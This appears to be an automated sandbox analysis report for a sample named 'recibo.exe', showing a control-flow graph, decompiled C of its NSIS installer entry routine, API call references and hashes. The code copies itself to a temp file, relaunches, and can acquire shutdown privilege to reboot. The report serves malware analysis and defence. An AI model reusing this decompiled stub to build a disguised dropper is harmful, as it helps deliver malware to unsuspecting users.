                                                                                  control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 26 40365c 21->26 26->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 39 403702-403706 35->39 40 4036fd-403701 35->40 36->35 36->36 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->44 45 40386a-403882 DeleteFileW call 40307d 37->45 42 4037c6-4037d4 call 405e39 39->42 43 40370c-403712 39->43 40->39 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 54 403722 47->54 55 40371d-403720 47->55 49 403781-4037bb 48->49 50 403767-40376c 48->50 58 4037c3-4037c5 49->58 59 4037bd-4037c1 49->59 50->49 56 40376e-403776 50->56 54->48 55->48 55->54 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->49 62->63 63->49 64->45 64->67 65->37 70 403894-4038a7 call 405e39 66->70 71 403935-40393c call 403bec 66->71 78 403a69-403a78 call 405b9d ExitProcess 67->78 79 403a7e-403a84 67->79 81 4038f9-403906 70->81 82 4038a9-4038de 70->82 77 403941-403944 71->77 77->67 84 403a86-403a9b GetCurrentProcess OpenProcessToken 79->84 85 403afc-403b04 79->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 94 4038e6-4038eb 86->94 95 4038ed-4038f5 86->95 87->88 89->67 105 40391c-403932 call 40653d * 2 89->105 103 40396a-403984 lstrcatW lstrcmpiW 90->103 104 40395f-403965 lstrcatW 90->104 106 403ae8-403af3 ExitWindowsEx 92->106 107 403adc-403ae6 92->107 93->92 94->95 99 4038f7 94->99 95->86 95->99 99->81 109 403a57 103->109 110 40398a-40398d 103->110 104->103 105->71 106->85 108 403af5-403af7 call 40140b 106->108 107->106 107->108 108->85 109->67 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 121 40399b-4039ab SetCurrentDirectoryW 114->121 115->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 134 403a50-403a52 call 4062fd 131->134 132->131 133 403a18-403a38 call 4062fd call 40657a call 405b20 132->133 133->131 142 403a3a-403a41 CloseHandle 133->142 134->109 142->131
                                                                                  C-Code - Quality: 79%
                                                                                  			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				signed int _t234;
				WCHAR* _t235;

				0x440000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				E0040653D(0x440000, GetCommandLineW());
				_t94 = 0x440000;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				if( *0x440000 == _t234) {
					_t94 = 0x440002;
				}
				_t199 = CharNextW(E00405E39(_t94, 0x440000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(0x440800, _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(0x440000, _t189);
											if(_t219 < 0x440000) {
												L48:
												_t264 = _t219 - 0x440000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x440000) {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x441800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags =  *0x440800;
														if( *0x440800 == 0) {
															E0040653D(0x440800, 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\recibo.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(0x440800, _t222);
												E0040653D(0x441000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x440000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}















































                                                                                  0x0040353b
                                                                                  0x0040353c
                                                                                  0x00403543
                                                                                  0x00403546
                                                                                  0x0040354d
                                                                                  0x00403550
                                                                                  0x00403563
                                                                                  0x00403569
                                                                                  0x0040356c
                                                                                  0x0040356f
                                                                                  0x0040357d
                                                                                  0x00403585
                                                                                  0x00403590
                                                                                  0x004035a9
                                                                                  0x004035ab
                                                                                  0x004035b3
                                                                                  0x004035b3
                                                                                  0x004035be
                                                                                  0x004035c0
                                                                                  0x004035c0
                                                                                  0x004035d5
                                                                                  0x004035fa
                                                                                  0x00403608
                                                                                  0x0040360b
                                                                                  0x00403612
                                                                                  0x00403619
                                                                                  0x00403619
                                                                                  0x00403612
                                                                                  0x0040361b
                                                                                  0x00403620
                                                                                  0x00403621
                                                                                  0x0040362d
                                                                                  0x00403631
                                                                                  0x00403638
                                                                                  0x00403646
                                                                                  0x0040364b
                                                                                  0x00403652
                                                                                  0x00403656
                                                                                  0x0040365a
                                                                                  0x0040365c
                                                                                  0x0040365c
                                                                                  0x0040365a
                                                                                  0x00403663
                                                                                  0x0040366a
                                                                                  0x00403670
                                                                                  0x00403688
                                                                                  0x00403698
                                                                                  0x004036aa
                                                                                  0x004036b1
                                                                                  0x004036b3
                                                                                  0x004036b4
                                                                                  0x004036c5
                                                                                  0x004036c9
                                                                                  0x004036c9
                                                                                  0x004036dc
                                                                                  0x004036de
                                                                                  0x004037d8
                                                                                  0x004037d8
                                                                                  0x004037db
                                                                                  0x004037de
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004036e8
                                                                                  0x004036e9
                                                                                  0x004036ec
                                                                                  0x004036f5
                                                                                  0x004036f5
                                                                                  0x004036f8
                                                                                  0x004036fb
                                                                                  0x004036fe
                                                                                  0x00403701
                                                                                  0x00403701
                                                                                  0x00403701
                                                                                  0x00403702
                                                                                  0x00403706
                                                                                  0x004037c6
                                                                                  0x004037cf
                                                                                  0x004037d1
                                                                                  0x004037d4
                                                                                  0x004037d7
                                                                                  0x004037d7
                                                                                  0x004037d7
                                                                                  0x00000000
                                                                                  0x0040370c
                                                                                  0x0040370d
                                                                                  0x0040370e
                                                                                  0x00403712
                                                                                  0x0040372c
                                                                                  0x00403733
                                                                                  0x00403746
                                                                                  0x00403747
                                                                                  0x0040375c
                                                                                  0x00403761
                                                                                  0x00403763
                                                                                  0x00403765
                                                                                  0x00403781
                                                                                  0x00403788
                                                                                  0x0040379b
                                                                                  0x0040379c
                                                                                  0x004037b1
                                                                                  0x004037b7
                                                                                  0x004037b9
                                                                                  0x004037bb
                                                                                  0x004037c3
                                                                                  0x004037c5
                                                                                  0x00000000
                                                                                  0x004037c5
                                                                                  0x004037bf
                                                                                  0x004037c1
                                                                                  0x004037e6
                                                                                  0x004037ea
                                                                                  0x004037f3
                                                                                  0x004037f8
                                                                                  0x004037fe
                                                                                  0x00403809
                                                                                  0x0040380b
                                                                                  0x00403810
                                                                                  0x00403812
                                                                                  0x0040386a
                                                                                  0x0040386f
                                                                                  0x00403878
                                                                                  0x0040387f
                                                                                  0x00403882
                                                                                  0x00403a59
                                                                                  0x00403a59
                                                                                  0x00403a5e
                                                                                  0x00403a67
                                                                                  0x00403a84
                                                                                  0x00403afc
                                                                                  0x00403afc
                                                                                  0x00403b04
                                                                                  0x00403b06
                                                                                  0x00403b06
                                                                                  0x00403b0c
                                                                                  0x00403b0c
                                                                                  0x00403a9b
                                                                                  0x00403aa7
                                                                                  0x00403ab8
                                                                                  0x00403abf
                                                                                  0x00403ac6
                                                                                  0x00403ac6
                                                                                  0x00403ace
                                                                                  0x00403ada
                                                                                  0x00403ae8
                                                                                  0x00403af3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403adc
                                                                                  0x00403adc
                                                                                  0x00403add
                                                                                  0x00403adf
                                                                                  0x00403ae0
                                                                                  0x00403ae1
                                                                                  0x00403ae6
                                                                                  0x00403af5
                                                                                  0x00403af7
                                                                                  0x00000000
                                                                                  0x00403af7
                                                                                  0x00000000
                                                                                  0x00403ae6
                                                                                  0x00403ada
                                                                                  0x00403a71
                                                                                  0x00403a78
                                                                                  0x00403a78
                                                                                  0x0040388e
                                                                                  0x00403935
                                                                                  0x00403935
                                                                                  0x00403941
                                                                                  0x00000000
                                                                                  0x00403941
                                                                                  0x0040389f
                                                                                  0x004038a7
                                                                                  0x004038f9
                                                                                  0x004038f9
                                                                                  0x004038ff
                                                                                  0x00403906
                                                                                  0x00403954
                                                                                  0x00403956
                                                                                  0x0040395b
                                                                                  0x0040395d
                                                                                  0x00403965
                                                                                  0x00403965
                                                                                  0x00403970
                                                                                  0x0040397c
                                                                                  0x00403982
                                                                                  0x00403984
                                                                                  0x00403a57
                                                                                  0x00403a57
                                                                                  0x00403a57
                                                                                  0x00000000
                                                                                  0x0040398a
                                                                                  0x0040398a
                                                                                  0x0040398c
                                                                                  0x0040398d
                                                                                  0x00403996
                                                                                  0x0040398f
                                                                                  0x0040398f
                                                                                  0x0040398f
                                                                                  0x0040399c
                                                                                  0x004039a4
                                                                                  0x004039ab
                                                                                  0x004039b3
                                                                                  0x004039b3
                                                                                  0x004039c0
                                                                                  0x004039cc
                                                                                  0x004039d6
                                                                                  0x004039d6
                                                                                  0x004039d8
                                                                                  0x004039df
                                                                                  0x004039e9
                                                                                  0x004039f5
                                                                                  0x004039fb
                                                                                  0x00403a01
                                                                                  0x00403a04
                                                                                  0x00403a0e
                                                                                  0x00403a14
                                                                                  0x00403a16
                                                                                  0x00403a1a
                                                                                  0x00403a2b
                                                                                  0x00403a31
                                                                                  0x00403a36
                                                                                  0x00403a38
                                                                                  0x00403a3b
                                                                                  0x00403a41
                                                                                  0x00403a41
                                                                                  0x00403a38
                                                                                  0x00403a16
                                                                                  0x00403a44
                                                                                  0x00403a4b
                                                                                  0x00403a4b
                                                                                  0x00403a4b
                                                                                  0x00403a4b
                                                                                  0x00403a52
                                                                                  0x00000000
                                                                                  0x00403a52
                                                                                  0x00403984
                                                                                  0x00403908
                                                                                  0x0040390b
                                                                                  0x0040390f
                                                                                  0x00403914
                                                                                  0x00403916
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403922
                                                                                  0x0040392d
                                                                                  0x00403932
                                                                                  0x00000000
                                                                                  0x00403932
                                                                                  0x004038b0
                                                                                  0x004038c8
                                                                                  0x004038d9
                                                                                  0x004038da
                                                                                  0x004038de
                                                                                  0x004038e0
                                                                                  0x004038ee
                                                                                  0x004038f5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004038f5
                                                                                  0x004038f7
                                                                                  0x00000000
                                                                                  0x004038f7
                                                                                  0x0040381a
                                                                                  0x00403826
                                                                                  0x0040382b
                                                                                  0x00403830
                                                                                  0x00403832
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040383a
                                                                                  0x00403842
                                                                                  0x00403853
                                                                                  0x0040385b
                                                                                  0x0040385d
                                                                                  0x00403862
                                                                                  0x00403864
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403864
                                                                                  0x00000000
                                                                                  0x004037c1
                                                                                  0x0040376a
                                                                                  0x0040376c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040376e
                                                                                  0x00403772
                                                                                  0x00403776
                                                                                  0x0040377d
                                                                                  0x0040377d
                                                                                  0x0040377d
                                                                                  0x0040377d
                                                                                  0x00000000
                                                                                  0x0040377d
                                                                                  0x00403778
                                                                                  0x0040377b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040377b
                                                                                  0x00403714
                                                                                  0x00403718
                                                                                  0x0040371b
                                                                                  0x00403722
                                                                                  0x00403722
                                                                                  0x00000000
                                                                                  0x00403722
                                                                                  0x0040371d
                                                                                  0x00403720
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403720
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004036ee
                                                                                  0x004036ee
                                                                                  0x004036ef
                                                                                  0x004036f0
                                                                                  0x004036f0
                                                                                  0x00000000
                                                                                  0x004036ee
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                  • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                  • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                  • CharNextW.USER32(00000000,00440000,00000020,00440000,00000000), ref: 004036D6
                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                    • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\recibo.exe,0042AA28,00000001), ref: 00403A0E
                                                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                  • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                  • ExitProcess.KERNEL32 ref: 00403A78
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                  • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                  • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\recibo.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                  • API String ID: 3859024572-507065716
                                                                                  • Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                                                  • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                  • Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                                                  • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
